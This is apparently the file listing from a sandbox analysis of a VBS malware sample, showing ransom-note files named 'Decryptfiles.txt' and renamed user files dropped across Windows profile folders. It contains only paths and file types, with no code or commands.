Files

File Path | Type | Category | Malicious | |
---|---|---|---|---|
NOTIFICATION_OF_DEPENDANTS_1.vbs | ASCII text | initial sample | ||
C:\Users\Public\AccountPictures\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Documents\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Downloads\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Libraries\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Libraries\RecordedTV.library-ms | data | modified | ||
C:\Users\Public\Music\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Pictures\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\Public\Videos\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\.curlrc.SuMh | data | dropped | ||
C:\Users\user\.ms-ad\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\3D Objects\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | ||
C:\Users\user\AppData\Local\Temp\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10rclwu2.hdm.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iigs5yg.am1.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nxkjeth.jqb.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aakjs4su.ynx.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5gy5d2y.w0s.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ce5tmog3.w5r.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmijsyeu.ejv.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czjtfiqo.ezw.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd4cmrln.ljv.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muq24lzp.1ro.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmgfecbn.m42.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt0cmllf.f1b.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y25lwppa.tsg.psm1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdqsw1gs.ytr.ps1 | ASCII text, with no line terminators | dropped | ||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe | PE32 executable (GUI) Intel 80386, for MS Windows | dropped | ||
C:\Users\user\AppData\Local\Temp\fjeljies.cpl | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | ||
C:\Users\user\AppData\Roaming\.curlrc.echn | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav | data | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Headlights\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Linguistics\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\RTTransfer\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Sonar\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\AddIns\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Credentials\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Excel\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.XxpC | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Network\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Protect\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Speech\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Spelling\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.bEiR | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Vault\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\AccountPictures\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent Items\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms | Composite Document File V2 Document, Cannot read section info | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3 | byte-swapped Berkeley vfont data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf | DOS executable (COM, 0x8C-variant) | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf.Targ (copy) | DOS executable (COM, 0x8C-variant) | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3 | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.mHle | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.BxTm | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs.hcyU | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.vgZW | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg | data | dropped | ||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Extensions\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal.FoaS | DOS executable (COM, 0x8C-variant) | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4 | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\Decryptfiles.txt | ASCII text, with very long lines (3354), with CRLF line terminators | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa | data | dropped | ||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32 | data | dropped | ||
